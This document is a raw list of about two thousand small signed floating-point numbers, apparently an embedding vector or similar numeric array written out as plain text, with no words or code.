0.003400541143491864, -0.0037761027924716473, -0.004988143220543861, 0.002951574046164751, 0.002205571858212352, 0.002830370096489787, 0.010549871250987053, 0.015350233763456345, -0.011942864395678043, 0.0036907480098307133, 0.021768925711512566, -0.01685248129069805, -0.003704404691234231, -0.012468650937080383, -0.024350060150027275, 0.03198420628905296, 0.0034995528403669596, 0.025975218042731285, 0.022834155708551407, 0.011068829335272312, -0.010727410204708576, 0.005445645656436682, 0.012263799086213112, 0.006883022841066122, 0.0001244048326043412, 0.013663619756698608, -0.009450499899685383, 0.005804136395454407, -0.015705309808254242, 0.02257467620074749, 0.007470265030860901, 0.012530106119811535, -0.0138616431504488, -0.008829115889966488, 0.007429294753819704, -0.005541243124753237, -0.0021680155768990517, -0.007313211914151907, -0.009600724093616009, 0.01798599399626255, -0.00543198874220252, -0.014530826359987259, -0.013253916054964066, -0.005411503836512566, 0.015322919934988022, 0.011656071990728378, 0.02631663717329502, -0.00009943851182470098, -0.02343505434691906, -0.008719861507415771, -0.012987609021365643, -0.00373171828687191, -0.008016536943614483, 0.00813944824039936, 0.008214560337364674, -0.01991160213947296, -0.019597496837377548, -0.01511806808412075, 0.014312317594885826, -0.004417972173541784, 0.0117721538990736, 0.011936035938560963, 0.01905122399330139, 0.008262358605861664, 0.010577185079455376, -0.007627318147569895, -0.001304223551414907, -0.00889057107269764, 0.003397126914933324, -0.0075385491363704205, -0.004660380072891712, -0.020799294114112854, 0.015814565122127533, 0.003055707085877657, -0.01720755733549595, 0.006975206080824137, -0.019160479307174683, 0.007094703149050474, -0.01152633223682642, 0.013888956978917122, 0.022328853607177734, 0.0021680155768990517, 0.0035405231174081564, -0.016702255234122276, 0.00942318607121706, -0.004144836217164993, -0.00681815342977643, 0.007258584722876549, -0.01894197054207325, -0.011635586619377136, 0.0003966871299780905, 0.011253195814788342, -0.027026791125535965, -0.021932806819677353, -0.013731904327869415, -0.005053013097494841, 0.00418580649420619, -0.006589401978999376, -0.021741611883044243, -0.002531627658754587, 0.008064335212111473, 0.027518434450030327, -0.010358676314353943, 0.018436668440699577, -0.00018884781457018107, -0.009156879037618637, -0.013984554447233677, 0.0005168241914361715, 0.012687159702181816, 0.0050495988689363, -0.01618329808115959, -0.0008066042792052031, -0.007668288424611092, -0.02649417519569397, 0.0028764617163687944, 0.012448165565729141, -0.009245648048818111, 0.009867032058537006, -0.0025179709773510695, -0.00943001452833414, -0.013608993031084538, -0.02056712843477726, -0.013766045682132244, 0.0029174319934099913, 0.006138728000223637, 0.006186526734381914, 0.02840612642467022, 0.02497827261686325, 0.019816003739833832, 0.00035507656866684556, 0.016237925738096237, 0.0015986982034519315, -0.009546097368001938, 0.020130110904574394, -0.015049784444272518, 0.002169722691178322, -0.013704590499401093, -0.01151950377970934, 0.01172435563057661, 0.004684279672801495, -0.004168735817074776, 0.003400541143491864, 0.0009158586035482585, -0.0181635320186615, 0.01835472881793976, 0.0016533252783119678, 0.029908373951911926, -0.017835769802331924, -0.027054104954004288, -0.0075522055849432945, -0.0191195085644722, 0.014612766914069653, -0.0016396685969084501, -0.03365033492445946, -0.011963349767029285, 0.008999825455248356, -0.004544297233223915, -0.02131825126707554, 0.009300274774432182, -0.0047593917697668076, 0.005790479481220245, -0.025702081620693207, 0.002205571858212352, -0.004124350845813751, 0.014435228891670704, 0.007490750402212143, 0.0163744930177927, 0.011444391682744026, -0.0035063812974840403, -0.01666128635406494, -0.02486901730298996, 0.0178084559738636, -0.01100054569542408, -0.016579344868659973, -0.003950227051973343, 0.003337378380820155, -0.004612581338733435, -0.003800002159550786, 0.010440616868436337, -0.02236982434988022, -0.014571796171367168, 0.005838278215378523, 0.015650684013962746, -0.009791919961571693, -0.02555185742676258, -0.0006636347388848662, -0.015650684013962746, 0.014271346852183342, -0.012932981364428997, 0.006340165622532368, 0.008549151942133904, -0.0021150954999029636, -0.0047491490840911865, -0.0062650530599057674, 0.00831698626279831, 0.0011096142698079348, -0.004216534551233053, 0.012017976492643356, -0.01258473377674818, -0.012864697724580765, 0.03042733110487461, -0.0020297407172620296, -0.0016849066596478224, -0.005384190008044243, -0.009334417060017586, -0.013390484265983105, 0.006131899543106556, -0.034196607768535614, -0.0053705330938100815, -0.01009236928075552, 0.014325974509119987, 0.016319865360856056, 0.00813944824039936, 0.0020365689415484667, 0.026958506554365158, -0.016483748331665993, -0.004161907359957695, -0.00938221625983715, -0.003100091591477394, -0.007442951202392578, -0.007340525276958942, -0.018778087571263313, 0.0003151731507387012, 0.0017378267366439104, 0.01895562745630741, 0.02047153003513813, 0.006306023336946964, -0.018532266840338707, 0.012905668467283249, -0.004168735817074776, -0.00831698626279831, -0.02574305236339569, 0.02058078534901142, 0.0012726422864943743, 0.0027535506524145603, 0.002733065513893962, -0.004858403466641903, -0.014366944320499897, -0.007675116881728172, -0.0016251582419499755, -0.002130459528416395, 0.02179623953998089, 0.013431454077363014, -0.0014646908966824412, 0.009020310826599598, -0.0167295690625906, -0.0032725087366998196, -0.00817358959466219, 0.0007011909037828445, -0.006947892718017101, 0.01282372698187828, 0.00030898491968400776, -0.005735852289944887, -0.0009252476156689227, -0.010584013536572456, 0.010693267919123173, 0.0008002026588656008, 0.039085738360881805, -0.024650508537888527, -0.010945918038487434, -0.038129761815071106, 0.01190872211009264, 0.019597496837377548, 0.003608807222917676, 0.02746380865573883, 0.0009303689002990723, 0.005005213897675276, -0.009525611996650696, -0.0061079999431967735, 0.0038307299837470055, 0.009867032058537006, 0.015391204506158829, 0.007743400987237692, 0.009252476505935192, 0.0002720688935369253, 0.010932262055575848, 0.0010746187763288617, 0.009853375144302845, 0.0198979452252388, -0.010898119769990444, 0.014899559319019318, -0.019297046586871147, 0.0029208462219685316, 0.02966255135834217, -0.002620396902784705, -0.02679462544620037, -0.014148436486721039, -0.01276910025626421, -0.016142327338457108, 0.009245648048818111, 0.005612941458821297, 0.026453204452991486, -0.011587787419557571, -0.02784619852900505, -0.007033247500658035, 0.013998211361467838, 0.0010097490157932043, 0.037747371941804886, -0.02775060012936592, -0.00002193888940382749, -0.004796947818249464, 0.023093635216355324, -0.04116157069802284, 0.0036805053241550922, -0.018900999799370766, 0.0221103448420763, -0.00852183811366558, -0.011806296184659004, -0.012366225011646748, 0.009450499899685383, 0.0016191833419725299, 0.0056436690501868725, 0.0028849972877651453, 0.008631092496216297, 0.017535319551825523, -0.00113095308188349, 0.040506042540073395, -0.014175749383866787, -0.01731681264936924, 0.03608124330639839, -0.014148436486721039, -0.017917711287736893, 0.007115188520401716, -0.0007528306450694799, 0.008665233850479126, 0.008644749410450459, 0.012803242541849613, 0.009061281569302082, 0.01922876201570034, 0.002775742905214429, 0.01028356421738863, 0.00196145661175251, 0.007695602253079414, -0.02142750658094883, -0.012973952107131481, -0.007251756265759468, 0.02466416545212269, 0.015814565122127533, 0.00067814503563568, 0.018108906224370003, 0.011451220139861107, 0.005223722662776709, -0.02064906805753708, 0.00099865288939327, -0.005773408804088831, -0.02437737211585045, -0.012072604149580002, -0.012373053468763828, 0.017958680167794228, 0.023312143981456757, -0.01636083610355854, -0.007750229444354773, -0.007436123210936785, 0.04178978130221367, -0.014448885805904865, -0.00252479943446815, -0.0036224639043211937, 0.006886437069624662, -0.007586347870528698, -0.022260570898652077, -0.01028356421738863, 0.00865840632468462, -0.0047593917697668076, 0.0036327065899968147, 0.008426240645349026, -0.007101531606167555, -0.03995977342128754, -0.00943001452833414, 0.0030539999715983868, 0.02017108164727688, 0.006401621270924807, 0.009457328356802464, 0.0010353554971516132, -0.014517169445753098, 0.005438817199319601, -0.02391304261982441, -0.0006764379795640707, -0.014312317594885826, 0.01525463629513979, -0.011253195814788342, 0.012195514515042305, -0.01367727667093277, 0.007900454103946686, 0.018190845847129822, 0.011676556430757046, 0.004684279672801495, -0.012475479394197464, 0.02230153977870941, 0.0027262370567768812, 0.012994437478482723, -0.006114828400313854, -0.004277990199625492, -0.03446974232792854, 0.0061796982772648335, -0.015350233763456345, -0.003933155909180641, -0.005718781612813473, 0.009600724093616009, -0.033349886536598206, -0.03272167220711708, -0.02755940519273281, -0.024814389646053314, 0.00029916909988969564, 0.011178083717823029, 0.01798599399626255, -0.010297221131622791, -0.010508901439607143, 0.009505126625299454, 0.011970178224146366, -0.013397312723100185, -0.02077198028564453, -0.003912671003490686, 0.0022806841880083084, 0.0010882755741477013, -0.02219228632748127, 0.013643134385347366, -0.030645839869976044, -0.0006410156493075192, 0.014653737656772137, 0.03173838183283806, -0.0025060211773961782, -0.0071834721602499485, -0.01046793069690466, -0.02064906805753708, 0.013083206489682198, -0.004438457079231739, 0.016756882891058922, 0.02821493148803711, 0.003793173935264349, -0.012072604149580002, -0.0064767333678901196, -0.015200008638203144, -0.004168735817074776, 0.012045290321111679, -0.008385269902646542, 0.017371438443660736, -0.003248609369620681, -0.007961909286677837, 0.0018283029785379767, 0.00941635761409998, 0.0062650530599057674, 0.0036805053241550922, -0.014162092469632626, -0.021304594352841377, -0.006224082782864571, 0.022984379902482033, -0.005797307938337326, -0.019351674243807793, 0.00531249213963747, 0.006510875187814236, -0.002681852551177144, 0.005988503340631723, 0.006790839601308107, 0.0021355808712542057, 0.0004950587172061205, -0.010106026194989681, 0.016401806846261024, -0.02277952805161476, 0.022547362372279167, 0.02373550459742546, -0.0029020681977272034, 0.013670448213815689, 0.017002705484628677, 0.004213120322674513, 0.0024240806233137846, -0.007258584722876549, 0.011021031066775322, 0.004059481434524059, 0.009389043785631657, 0.0011394885368645191, 0.018969284370541573, 0.009006653912365437, -0.0016243046848103404, 0.02601618878543377, 0.003258851822465658, -0.015227322466671467, 0.023189231753349304, 0.012639360502362251, -0.0049369302578270435, 0.004117522854357958, 0.004465770907700062, -0.028925085440278053, -0.0001655886007938534, -0.015923818573355675, 0.0040219249203801155, 0.016524717211723328, 0.008310157805681229, 0.0015031006187200546, -0.0016362543683499098, 0.029334789142012596, -0.00425409059971571, 0.02064906805753708, 0.0030198581516742706, 0.0005262132617644966, 0.00418580649420619, 0.010461102239787579, 0.004742321092635393, 0.0034893101546913385, 0.0062650530599057674, -0.02870657667517662, 0.004660380072891712, 0.0046740369871258736, -0.005667568650096655, 0.015186352655291557, -0.010017256252467632, -0.01597844623029232, 0.0047354926355183125, -0.0014296954032033682, -0.004158493131399155, -0.016142327338457108, -0.016579344868659973, -0.0061079999431967735, -0.0055583142675459385, 0.01827278733253479, 0.029498670250177383, -0.009006653912365437, 0.0006589401746168733, -0.020157424733042717, -0.015145381912589073, -0.019351674243807793, 0.0008642188622616231, -0.024527598172426224, 0.020826607942581177, 0.02037593349814415, -0.03143793344497681, -0.004038996063172817, -0.005783651024103165, 0.0014740799088031054, 0.018136220052838326, 0.014558140188455582, -0.003987783100455999, -0.009682665579020977, 0.005459302570670843, -0.0030761922243982553, 0.010959574952721596, -0.007593176327645779, -0.016087699681520462, 0.0012291112216189504, -0.02545625902712345, 0.016702255234122276, 0.0181635320186615, 0.00531249213963747, -0.0047593917697668076, -0.01913316547870636, -0.0021150954999029636, -0.02256101928651333, -0.012147716246545315, -0.02007548324763775, -0.00523737957701087, -0.00099865288939327, -0.0034295618534088135, -0.007777542807161808, 0.01506344135850668, 0.008009708486497402, 0.0022994622122496367, -0.006725969724357128, -0.01596478931605816, 0.026139099150896072, -0.013383655808866024, 0.003199103521183133, -0.011150769889354706, 0.021031459793448448, -0.0012419144622981548, -0.0113829355686903, -0.02574305236339569, 0.0014792012516409159, 0.002181672491133213, 0.0036975762341171503, 0.019829660654067993, 0.009300274774432182, -0.007927767932415009, -0.011642415076494217, 0.008590121753513813, -0.011171255260705948, 0.0016311330255120993, 0.013909442350268364, 0.035453032702207565, 0.016497403383255005, 0.007210785988718271, 0.018996596336364746, 0.011478533037006855, -0.026166412979364395, 0.013561193831264973, 0.0038034163881093264, 0.0036224639043211937, -0.022793184965848923, 0.009389043785631657, -0.010536214336752892, -0.00990117434412241, -0.012161373160779476, -0.015637027099728584, -0.015555085614323616, -0.0503116212785244, -0.007565862499177456, 0.02313460409641266, 0.015732623636722565, 0.011936035938560963, -0.009156879037618637, 0.007046904414892197, 0.007818513549864292, 0.02094951830804348, -0.0021919149439781904, -0.00622066855430603, 0.0001563062542118132, 0.007716087158769369, -0.0022892197594046593, -0.009791919961571693, -0.049301017075777054, 0.011417077854275703, 0.0013076377799734473, -0.008501352742314339, -0.021222654730081558, -0.008112134411931038, 0.0034363900776952505, 0.015377547591924667, -0.01066595409065485, 0.01722121424973011, -0.012400366365909576, -0.02402229607105255, -0.004773048684000969, 0.003415904939174652, 0.03108285740017891, 0.003847801126539707, 0.02094951830804348, -0.00856280792504549, -0.015322919934988022, -0.02096317522227764, -0.0007391738472506404, 0.001402381807565689, 0.013909442350268364, -0.007251756265759468, -0.005541243124753237, -0.0022124003153294325, -0.0029140179976820946, 0.002138995099812746, 0.013438282534480095, -0.000398607604438439, -0.008590121753513813, 0.0037180616054683924, 0.0004528079880401492, -0.026371264830231667, -0.02477342076599598, -0.0002530774218030274, -0.0065586743876338005, -0.01692076399922371, -0.00956658273935318, -0.000552246521692723, 0.014913216233253479, -0.0007391738472506404, 0.004312132019549608, 0.008159932680428028, 0.004469185136258602, 0.0026477104984223843, -0.001209479640237987, 0.01752166450023651, -0.014189406298100948, -0.0192424189299345, -0.009027139283716679, -0.008808630518615246, -0.0015722381649538875, -0.013554365374147892, -0.0029532811604440212, 0.0030693640001118183, 0.004639895167201757, -0.018204502761363983, -0.005298835225403309, 0.01190872211009264, 0.025032898411154747, 0.034578997641801834, 0.0020792465656995773, -0.006606473121792078, -0.023858414962887764, 0.023954013362526894, 0.00017391071014571935, -0.00099865288939327, -0.003110334277153015, 0.0064664906822144985, -0.020225707441568375, -0.005230551119893789, -0.03386884182691574, -0.01653837412595749, 0.00938221625983715, -0.00320593174546957, -0.018696147948503494, -0.01828644424676895, -0.006961549632251263, -0.02220594324171543, 0.01873711869120598, -0.008719861507415771, 0.004476013593375683, -0.018791744485497475, 0.007511235307902098, 0.007688773795962334, 0.0321480892598629, -0.021673329174518585, -0.0100991977378726, -0.009860203601419926, -0.014803961850702763, 0.012454994022846222, 0.008952027186751366, -0.009532440453767776, 0.018149875104427338, -0.015732623636722565, -0.0163744930177927, 0.01262570358812809, -0.00975777767598629, 0.006801082286983728, -0.01825913041830063, -0.026917535811662674, 0.0015252928715199232, 0.00399461155757308, -0.01723487116396427, -0.01008554082363844, 0.021359222009778023, -0.013793359510600567, -0.023079978302121162, 0.0013340978184714913, -0.01315149012953043, -0.007354182191193104, 0.00013891517301090062, 0.004301889333873987, 0.006159212905913591, -0.001654178835451603, 0.030973603948950768, 0.01864152029156685, 0.015637027099728584, 0.013834330253303051, 0.0036053929943591356, 0.003557594260200858, -0.009696322493255138, 0.0022840984165668488, 0.015759937465190887, 0.014831275679171085, -0.008740346878767014, -0.000011376214388292283, 0.0011710699182003736, 0.0001644149742787704, 0.02077198028564453, 0.018586892634630203, 0.016579344868659973, 0.008262358605861664, 0.012461822479963303, 0.0028747546020895243, -0.007101531606167555, 0.022233257070183754, -0.01951555535197258, -0.007606832776218653, -0.010269907303154469, 0.0015304142143577337, -0.006282124202698469, -0.014954186975955963, -0.0015372425550594926, 0.01406649500131607, 0.011656071990728378, 0.014230377040803432, -0.020922204479575157, 0.0001596137590240687, 0.007900454103946686, 0.008289672434329987, 0.010208452120423317, -0.021168027073144913, -0.0002613995166029781, 0.00009581093036103994, 0.02418617717921734, -0.00504277041181922, -0.003974126186221838, 0.0187644325196743, -0.0011608272325247526, 0.01382750179618597, -0.0163744930177927, 0.012598390690982342, 0.005076912231743336, -0.003397126914933324, 0.003120576962828636, -0.000189381287782453, -0.003475653473287821, 0.007750229444354773, 0.01067278254777193, 0.013096863403916359, -0.011089314706623554, 0.007504406850785017, 0.017330467700958252, -0.015022470615804195, 0.01682516746222973, 0.02172795496881008, -0.013274401426315308, -0.027791570872068405, -0.01157413050532341, -0.0014040889218449593, -0.0010029206750914454, -0.004878888837993145, -0.019665779545903206, 0.004998385906219482, 0.015855535864830017, 0.039167679846286774, -0.002845733892172575, -0.01311052031815052, 0.012659845873713493, -0.010754723101854324, 0.015718966722488403, -0.0050495988689363, 0.017385095357894897, -0.0034807748161256313, 0.012318425811827183, 0.0018761017126962543, 0.0035780793987214565, -0.007934595458209515, 0.016142327338457108, -0.0015133431879803538, -0.008084820583462715, -0.0024155450519174337, 0.007374667562544346, 0.016087699681520462, 0.008091649040579796, 0.02153676003217697, -0.006162627134472132, 0.017166586592793465, 0.0015449245693162084, 0.0027740357909351587, -0.007395152468234301, -0.0046433089300990105, -0.027955451980233192, 0.004865231923758984, -0.008276015520095825, 0.006166041363030672, 0.002512849634513259, 0.0021253381855785847, 0.009074937552213669, -0.017139272764325142, -0.009989943355321884, -0.00602605938911438, -0.01683882437646389, -0.012359396554529667, 0.006067029666155577, 0.01569165289402008, 0.011601444333791733, 0.01229794044047594, 0.016948077827692032, -0.013274401426315308, 0.0054524741135537624, 0.014995156787335873, 0.002908896654844284, -0.0025964975357055664, -0.00833064317703247, -0.033732276409864426, -0.010741066187620163, -0.013841158710420132, -0.049901917576789856, -0.02755940519273281, 0.0033749346621334553, -0.009675837121903896, -0.007436123210936785, -0.019201448187232018, 0.022929752245545387, 0.008863258175551891, 0.005486615933477879, 0.021304594352841377, 0.011819953098893166, -0.0046637943014502525, 0.0021526517812162638, -0.014517169445753098, -0.02114071324467659, 0.0005099957925267518, -0.014885902404785156, -0.02295706607401371, -0.025306034833192825, -0.02190549299120903, 0.0032212957739830017, -0.0062855384312570095, 0.00783899798989296, 0.01229794044047594, 0.013458767905831337, -0.0016243046848103404, -0.028078364208340645, -0.014558140188455582, 0.011266852729022503, 0.012591562233865261, 0.000021031992218922824, -0.023762816563248634, -0.029225533828139305, -0.006684999447315931, 0.005097397603094578, 0.011792639270424843, -0.010447445325553417, -0.020416904240846634, -0.0005718781612813473, 0.006364064756780863, 0.008146275766193867, 0.01047475915402174, 0.0015133431879803538, 0.020430561155080795, 0.01156730204820633, -0.008200903423130512, -0.0031239911913871765, -0.00908859446644783, 0.012004319578409195, 0.015855535864830017, -0.0012743494007736444, 0.0014774941373616457, 0.0041141086257994175, 0.017057333141565323, -0.00032157477107830346, -0.02141384966671467, 0.0032076388597488403, 0.015090754255652428, -0.0038307299837470055, -0.024350060150027275, -0.006589401978999376, -0.0026511247269809246, -0.0007626464357599616, -0.00813944824039936, 0.00727224163711071, 0.0163744930177927, -0.00452381232753396, 0.0124276801943779, -0.0315471887588501, -0.010727410204708576, 0.016087699681520462, -0.006852295249700546, -0.004878888837993145, 0.007333697285503149, 0.017385095357894897, -0.006497218739241362, -0.022847812622785568, -0.03523452207446098, 0.013527052477002144, 0.023940356448292732, -0.011458048596978188, -0.02141384966671467, 0.009709978476166725, -0.01420306321233511, -0.0011941157281398773, 0.006575745064765215, 0.008767659775912762, 0.008480867370963097, 0.029881060123443604, -0.0014834690373390913, 0.006982034537941217, -0.01368410512804985, -0.002084367908537388, 0.0006243714597076178, -0.006084100808948278, -0.016319865360856056, -0.004243847914040089, -0.025128496810793877, 0.020539814606308937, 0.012700816616415977, -0.02123631164431572, 0.01085714902728796, -0.008467210456728935, 0.0031120413914322853, -0.0008484281715936959, 0.023325800895690918, -0.004742321092635393, 0.022124001756310463, 0.023079978302121162, -0.03242122381925583, -0.004629652481526136, 0.01311052031815052, 0.013513395562767982, 0.012639360502362251, -0.011942864395678043, 0.012564248405396938, -0.005875834729522467, 0.004001440014690161, 0.004892545752227306, 0.004124350845813751, -0.005875834729522467, 0.014844932593405247, 0.0071083600632846355, 0.004575025290250778, -0.013533880934119225, 0.009628037922084332, 0.008153104223310947, -0.0030591213144361973, 0.030591214075684547, 0.010911776684224606, -0.006090929266065359, -0.020812951028347015, -0.004383829887956381, -0.031410619616508484, 0.025142153725028038, 0.0022362996824085712, -0.018341071903705597, -0.027969108894467354, 0.010734237730503082, 0.003929741680622101, 0.016811510547995567, 0.0017566048773005605, -0.013185632415115833, -0.027614032849669456, -0.03184763714671135, -0.007647803518921137, -0.01458545308560133, 0.007770714350044727, -0.005742680747061968, 0.01186092384159565, 0.018586892634630203, -0.017193900421261787, -0.0014740799088031054, 0.006664514075964689, -0.026562459766864777, 0.004639895167201757, 0.018136220052838326, -0.0013793359976261854, -0.023298487067222595, -0.005128125194460154, 0.0154458312317729, -0.002567476825788617, -0.014216720126569271, -0.03050927259027958, 0.02870657667517662, -0.009669008664786816, -0.03662751615047455, 0.011410249397158623, -0.012475479394197464, 0.020225707441568375, -0.016101356595754623, 0.016989048570394516, -0.008296500891447067, 0.005442231427878141, 0.004298475105315447, 0.01349291019141674, 0.0028423196636140347, 0.003636120818555355, 0.023325800895690918, 0.00009180991764878854, 0.003362984862178564, 0.007149330340325832, 0.0009525612113066018, 0.0044009010307490826, 0.018231816589832306, -0.0005146903567947447, 0.0013434868305921555, 0.02238348126411438, 0.0026579529512673616, 0.015759937465190887, -0.006705484818667173, -0.020212052389979362, 0.0111439423635602, 0.012332082726061344, 0.0041141086257994175, 0.0009500005398876965, 0.0005663300980813801, 0.03550765663385391, -0.008262358605861664, 0.008590121753513813, -0.0022704415023326874, -0.001445059315301478, -0.03471556305885315, 0.002084367908537388, 0.004056067205965519, -0.021646015346050262, -0.01647009141743183, 0.0051178825087845325, 0.0033220145851373672, 0.001252157031558454, 0.010447445325553417, 0.03176569566130638, 0.016497403383255005, -0.0005108493496663868, -0.013793359510600567, -0.0005347487749531865, -0.008794973604381084, 0.026180069893598557, -0.0013366584898903966, 0.018627863377332687, 0.013137833215296268, 0.005442231427878141, 0.00784582644701004, 0.004670622758567333, -0.0061796982772648335, -0.005288592539727688, 0.019160479307174683, -0.019788691774010658, 0.006043130066245794, 0.016429120674729347, -0.0064562479965388775, -0.007005934137851, -0.010891291312873363, -0.009935315698385239, 0.0035371091216802597, -0.018395697697997093, -0.01569165289402008, -0.017344124615192413, 0.005230551119893789, 0.024828046560287476, 0.004349688068032265, -0.005609527230262756, -0.002179965376853943, 0.02249273657798767, -0.017180243507027626, 0.008835944347083569, 0.00425409059971571, -0.01008554082363844, -0.02114071324467659, 0.002340432722121477, -0.0163744930177927, 0.005192995071411133, -0.020403247326612473, 0.012188686057925224, 0.006684999447315931, -0.008016536943614483, -0.0044521139934659, 0.008282843977212906, 0.011068829335272312, 0.006241153925657272, -0.007483921945095062, -0.02679462544620037, 0.024049609899520874, 0.002828662982210517, 0.006316266022622585, 0.0074566081166267395, 0.003214467316865921, -0.012543763034045696, 0.007866311818361282, 0.015514114871621132, -0.0005411503952927887, -0.00037065387004986405, 0.011492189951241016, 0.0035883220843970776, -0.018709804862737656, -0.0017275841673836112, -0.01224331371486187, -0.022124001756310463, -0.0014740799088031054, -0.007907282561063766, 0.01922876201570034, 0.0031393549870699644, 0.009716806933283806, 0.0064664906822144985, 0.0026408820413053036, -0.016579344868659973, -0.01779479905962944, 0.007647803518921137, -0.014885902404785156, 0.00923881959170103, -0.00392291322350502, -0.007019591052085161, -0.006172869820147753, -0.0017275841673836112, -0.014558140188455582, 0.012543763034045696, 0.004861817695200443, -0.0056436690501868725, -0.0039024280849844217, 0.016483748331665993, 0.03654557466506958, 0.020307648926973343, 0.003834144212305546, -0.00026118612731806934, -0.015049784444272518, 0.0113829355686903, -0.020416904240846634, -0.007415637839585543, -0.006282124202698469, 0.024991929531097412, -0.03329525887966156, 0.0024821218103170395, -0.0024309088476002216, 0.0006798521499149501, -0.009744120761752129, 0.020403247326612473, -0.016811510547995567, 0.009887517429888248, 0.009197848848998547, 0.00865840632468462, -0.005421746056526899, -0.013014922849833965, 0.0015722381649538875, -0.0012308183358982205, 0.01210674550384283, -0.014762992039322853, 0.0162515826523304, 0.004124350845813751, 0.022902440279722214, 0.021960120648145676, -0.0075522055849432945, -0.006794253829866648, 0.012161373160779476, 0.007620489690452814, -0.020307648926973343, -0.0052851783111691475, -0.011970178224146366, 0.0060124024748802185, 0.028351498767733574, -0.004223363008350134, 0.005251036491245031, -0.0056436690501868725, 0.00674645509570837, -0.006183112505823374, -0.00432578893378377, -0.004291646648198366, -0.0019221934489905834, 0.004052652977406979, -0.010870805941522121, 0.00569488201290369, 0.003977540414780378, 0.010754723101854324, 0.01712561585009098, 0.003625878132879734, 0.02017108164727688, 0.028078364208340645, -0.0006687560235150158, 0.018108906224370003, -0.013083206489682198, 0.008719861507415771, 0.013021750375628471, -0.03337720036506653, 0.021659672260284424, 0.011922379024326801, 0.01972040720283985, -0.005865592043846846, 0.01435328833758831, 0.015104411169886589, 0.021208997815847397, -0.003888771403580904, -0.0014979792758822441, 0.004752563312649727, 0.01282372698187828, 0.00043552363058552146, 0.009853375144302845, 0.009921658784151077, -0.017863083630800247, -0.0034910172689706087, 0.024896331131458282, -0.003443218534812331, 0.0028081778436899185, -0.01315831858664751, -0.021864524111151695, -0.015391204506158829, -0.017098303884267807, 0.008037022314965725, 0.007524892222136259, -0.006766940467059612, 0.006630372256040573, 0.01157413050532341, 0.005769994575530291, -0.02037593349814415, -0.00543198874220252, 0.000634614028967917, 0.005875834729522467, -0.02277952805161476, 0.007873140275478363, 0.007067389786243439, 0.01884637214243412, 0.01530926302075386, -0.009771434590220451, 0.007470265030860901, -0.007005934137851, -0.03914036601781845, 0.0007233831565827131, -0.01636083610355854, 0.0016507647233083844, -0.014599109999835491, -0.00904762465506792, -0.0026238111313432455, 0.006777182687073946, -0.020130110904574394, -0.02821493148803711, -0.001033648382872343, 0.0020877819042652845, 0.02497827261686325, -0.009996771812438965, 0.011328308843076229, 0.013410969637334347, 0.01653837412595749, -0.004359930753707886, 0.003844386897981167, -0.006114828400313854, -0.00226019904948771, 0.005520758219063282, -0.02562014013528824, -0.013035407289862633, 0.006384550128132105, -0.001050719409249723, 0.00038388388929888606, -0.006039716303348541, -0.001375921769067645, -0.009546097368001938, 0.014134779572486877, 0.02592059038579464, -0.00009794480138225481, -0.011546817608177662, 0.01081617921590805, 0.0009320760145783424, -0.002314826240763068, 0.0011855802731588483, -0.009389043785631657, -0.005298835225403309, -0.009737292304635048, -0.006329922936856747, -0.0031905679497867823, 0.007285898085683584, -0.005667568650096655, -0.010952746495604515, 0.008733518421649933, 0.013185632415115833, -0.022506391629576683, -0.005073498003184795, 0.02249273657798767, -0.006790839601308107, 0.004479427821934223, -0.014189406298100948, 0.004243847914040089, -0.006753283552825451, 0.007019591052085161, 0.013895785436034203, -0.0005249329260550439, 0.0015543135814368725, 0.038976483047008514, 0.0004907909315079451, -0.017726516351103783, -0.012536934576928616, -0.0009568289387971163, 0.0155960563570261, 0.009170535951852798, -0.022164972499012947, -0.008911056444048882, -0.021495789289474487, -0.009587068110704422, 0.00248724315315485, 0.015923818573355675, -0.010065055452287197, 0.007135673426091671, -0.0023216544650495052, 0.01789039745926857, -0.00275013642385602, -0.006094343028962612, 0.006493804510682821, 0.022151315584778786, -0.0032212957739830017, -0.005701710470020771, -0.009074937552213669, 0.017289498820900917, -0.005261279176920652, 0.04580488055944443, 0.0023762816563248634, -0.003415904939174652, 0.010215280577540398, -0.0028218345250934362, 0.008207731880247593, 0.0024377373047173023, -0.002528213430196047, 0.00040564939263276756, -0.00320593174546957, -0.004882303066551685, 0.007046904414892197, 0.014749335125088692, 0.007825342006981373, -0.026931192725896835, 0.001068643992766738, 0.0027893995866179466, -0.012024804949760437, -0.002661367179825902, -0.038402896374464035, 0.004585267975926399, 0.0035610084887593985, 0.00490278797224164, -0.008269187062978745, 0.011068829335272312, 0.022260570898652077, 0.0003597711038310081, -0.023107292130589485, -0.0066542718559503555, 0.003557594260200858, 0.028542693704366684, -0.006046544294804335, -0.015268293209373951, -0.003117162734270096, 0.01209308858960867, -0.0012274041073396802, 0.012605218216776848, 0.01362947840243578, -0.012345739640295506, -0.008760832250118256, 0.007128845434635878, 0.0033424997236579657, -0.02086757682263851, 0.01835472881793976, -0.009914830327033997, 0.0036156356800347567, -0.0025452845729887486, 0.012700816616415977, 0.030154196545481682, 0.028433440253138542, -0.004086794797331095, 0.0176855456084013, -0.000311118783429265, 0.006486976053565741, 0.009587068110704422, -0.020061826333403587, 0.0192424189299345, -0.00904762465506792, -0.019269732758402824, -0.01950189843773842, 0.0005556606920436025, 0.0032725087366998196, -0.021659672260284424, -0.0025521130301058292, -0.018996596336364746, 0.0016251582419499755, 0.003909256774932146, -0.0033322570379823446, 0.0030164439231157303, 0.018682491034269333, -0.0024633437860757113, -0.0070127625949680805, -0.017002705484628677, -0.011171255260705948, -0.009266133420169353, -0.014421571977436543, -0.005998745560646057, 0.0002863658592104912, 0.013943584635853767, 0.0036566059570759535, -0.006032887846231461, -0.0008305036462843418, 0.0017446550773456693, -0.00199559866450727, -0.00007079126226017252, -0.008767659775912762, -0.0124276801943779, -0.004144836217164993, 0.003759031882509589, -0.011977006681263447, 0.011478533037006855, 0.017180243507027626, -0.017658231779932976, -0.011635586619377136, 0.010741066187620163, 0.003625878132879734, 0.01086397748440504, 0.006524532102048397, 0.008863258175551891, 0.004561368376016617, -0.006176284048706293, 0.0013195874635130167, -0.019064880907535553, 0.0006294927443377674, 0.0028423196636140347, -0.005152024794369936, 0.004595510195940733, -0.004346273839473724, -0.025784023106098175, 0.006630372256040573, 0.023189231753349304, -0.008870085701346397, -0.012598390690982342, -0.002581133507192135, 0.01100737415254116, -0.008774488233029842, 0.002398473909124732, -0.023885728791356087, 0.0075385491363704205, 0.020321305841207504, -0.011929207481443882, -0.003571250941604376, 0.003530280664563179, -0.004670622758567333, -0.020731009542942047, -0.011164426803588867, -0.004124350845813751, 0.0031478905584663153, 0.008945198729634285, -0.0051895808428525925, 0.004667208530008793, -0.0008313572034239769, 0.013731904327869415, 0.016989048570394516, 0.006855709478259087, 0.008064335212111473, 